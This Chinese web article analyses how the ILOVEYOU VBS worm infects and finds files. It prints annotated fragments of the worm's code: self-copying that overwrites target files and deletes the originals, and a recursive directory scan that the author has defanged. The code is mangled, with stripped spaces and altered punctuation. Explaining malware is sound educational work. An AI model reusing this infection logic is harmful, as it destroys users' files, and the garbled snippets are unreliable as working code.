童话说说技术创业美文职业
投稿投诉
职业母婴
职场个人
历史治疗
笔记技能
美文纠纷
幽默家庭
范文作文
乐趣解密
创业案例
社会工作
新闻家居
心理安全
技术八卦
仲裁思考
生活时事
运势奇闻
说说企业
魅力社交
安好健康
传统笑话
童话初中
男女饮食
周易阅读
爱好两性

vbs脚本病毒如何搜索文件

8月28日 鬼神氏投稿
  如果你打开电脑发现在每个盘里都有vbs、autorun。exe、。vbe、js等文件。然后打开任务管理器,发现进程中有wscript。exe进程,而且机子运行得很慢。那么,你要注意了,你的电脑中了VBS病毒。那么,vbs脚本病毒如何搜索文件呢?
  VBS脚本病毒一般是直接通过自我复制来感染文件的,病毒中的绝大部分代码都可以直接附加在其他同类程序的中间,譬如新欢乐时光病毒可以将自己的代码附加在。htm文件的尾部,并在顶部加入一条调用病毒代码的语句,而爱虫病毒则是直接生成一个文件的副本,将病毒代码拷入其中,并以原文件名作为病毒文件名的前缀,vbs作为后缀。
  下面我们通过爱虫病毒的部分代码具体分析一下这类病毒的感染和搜索原理:
  以下是文件感染的部分关键代码:
  Setfsocreateobject(scripting。filesystemobject)创建一个文件系统对象
  setselffso。opentextfile(wscript。scriptfullname,1)读打开当前文件(即病毒本身)
  vbscopyself。readall读取病毒全部代码到字符串变量vbscopy
  setapfso。opentextfile(目标文件。path,2,true)写打开目标文件,准备写入病毒代码
  ap。writevbscopy将病毒代码覆盖目标文件
  ap。close
  setcopfso。getfile(目标文件。path)得到目标文件路径
  cop。copy(目标文件。path。vbs)创建另外一个病毒文件(以。vbs为后缀)
  目标文件。delete(true)删除目标文件
  上面描述了病毒文件是如何感染正常文件的:首先将病毒自身代码赋给字符串变量vbscopy,然后将这个字符串覆盖写到目标文件,并创建一个以目标文件名为文件名前缀、vbs为后缀的文件副本,最后删除目标文件。
  下面我们具体分析一下文件搜索代码:
  该函数主要用来寻找满足条件的文件,并生成对应文件的一个病毒副本
  subscan(folder)scan函数定义,
  onerrorresumenext如果出现错误,直接跳过,防止弹出错误窗口
  setfolderfso。getfolder(folder)
  setfilesfolder。files当前目录的所有文件集合
  foreachfileinfilesextfso。GetExtensionName(file)获取文件后缀
  extlcase(ext)后缀名转换成小写字母
  ifextmp5then如果后缀名是mp5,则进行感染。请自己建立相应后缀名的文件,最好是非正常后缀名,以免破坏正常程序。
  Wscript。echo(file)
  endif
  next
  setsubfoldersfolder。subfolders
  foreachsubfolderinsubfolders搜索其他目录;递归调用
  scan()
  scan(subfolder)
  next
  endsub
  上面的代码就是VBS脚本病毒进行文件搜索的代码分析。搜索部分scan()函数做得比较短小精悍,非常巧妙,采用了一个递归的算法遍历整个分区的目录和文件。
  以上就是本站给大家分享的vbs脚本病毒如何搜索文件的相关介绍,希望能帮到您。稍后,我们要介绍怎样检测清除脚本病毒,欢迎关注更多网络病毒小知识。
投诉 评论 转载

前端怎么做安全登录下面的文章告诉大家这个功能可能并没有你所想像的那么简单,这是一个关系到用户安全的功能,希望大家能从下面的文章中能知道什么样的方法才是一个好的用户登录功能,一起来看一下前端怎么做……信用卡信息能更改吗随着我国金融行业的高速发展,我们经常会使用信用卡消费,信用卡相比普通银行储蓄卡来说,最方便的使用方式就是可以在卡里没有现金的情况下进行普通消费,在很多情况下只要按期归还消费的金……计算机病毒的破坏性是什么计算机病毒严重威胁我们的计算机系统,了解计算机病毒并做好防范工作很有必要。那么,计算机病毒的破坏性是什么那?就让本站的小编和你一起去了解一下吧!计算机病毒的破坏性:……vbs脚本病毒如何搜索文件如果你打开电脑发现在每个盘里都有vbs、autorun。exe、。vbe、js等文件。然后打开任务管理器,发现进程中有wscript。exe进程,而且机子运行得很慢。那么,你要……不root怎样杀木马病毒手机端因为安卓系统的开源性,更容易受到木马病毒感染。而有一类病毒我们称之为顽固病毒,可能需要root才能清除,那么,不root能清理吗,不root怎样杀木马病毒呢?小编认……360系统修复功能安全吗系统修复是用来修复系统中重要的项,使之恢复原始状态,例如病毒或者某些程序会修改系统的关键项,360系统修复就可以把它恢复到默认值,那么,360系统修复功能安全吗?怎样安全使用网……u盘会通过什么类型文件传播u盘在全世界有着众多的使用者,平均几个人可能就拥有一款u盘,由于u盘使用的广泛性,u盘病毒也渐渐流行起来了,目前u盘病毒已经是最为常见的计算机病毒之一,那么,u盘会通过什么类型……qq未接收完的文件会中毒吗当用户在接收qq聊天软件发送的文件时,感觉有危险,或者qq报警说文件有病毒,可以立即取消接收文件,那么,qq未接收完的文件会中毒吗?聊天软件传输文件会传播病毒怎么办呢?今天我们……常见的apk应用市场有哪些apk是Android安装包,随着移动互联网的流行,APP应用也是异常火爆,App应用市场就如破冰的泉水在我们的生活中到处渗透,那么,常见的apk应用市场有哪些呢?国内知……电脑中蠕虫病毒怎么办凡能够引起计算机故障,破坏计算机数据的程序统称为计算机病毒。所以从这个意义上说,蠕虫也是一种病毒。那么,电脑中蠕虫病毒怎么办呢?蠕虫病毒是一种常见的计算机病毒,它常驻于一……服务器共享文件感染病毒怎么办现在很多单位都有文件服务器,经常会共享文件让局域网用户访问。但是,对于大多数网管员来说,服务器共享文件管理一直是一个让人棘手的问题,特别是在病毒入侵后,更加让人头痛,那么,服务……微信安全中心注销账号怎么做微信安全中心悄然上线了“注销账号”功能,满足条件的用户,即可申请销号,让该微信号永远消失。如果有不想用微信的小伙伴现在可以拿起手机进行注销了。那么微信安全中心注销账号怎么做?……
网站入侵原理网站入侵方式恶意代码是什么恶意代码有哪些恶意代码防范恶意代码检测万能无线网络钥匙无线网络密码钥匙哪个好无线网络用万能钥匙打不开怎么回事万能钥匙破不了什么无线网络计算机病毒是什么什么是泄露个人信息罪不用农药怎么消灭卷叶蛾暑假见闻作文答案在风中飘荡朱雀在六爻八卦中的运用儿童安全座椅什么材质的好游万岁山作文特别怀念小时候的童年,感觉比现在的孩子要快乐很多。您有同感吗婆媳相处四大定律如何和睦相处金融凭证诈骗罪立案标准怎么规定的唐玄宗李隆基传位给了谁?李隆基之后谁继位?高蟾先辈以诗笔相示抒成寄酬业务模式趋同,技术和时间将成为下个壁垒

友情链接:中准网聚热点快百科快传网快生活快软网快好知文好找作文动态热点娱乐育儿情感教程科技体育养生教案探索美文旅游财经日志励志范文论文时尚保健游戏护肤业界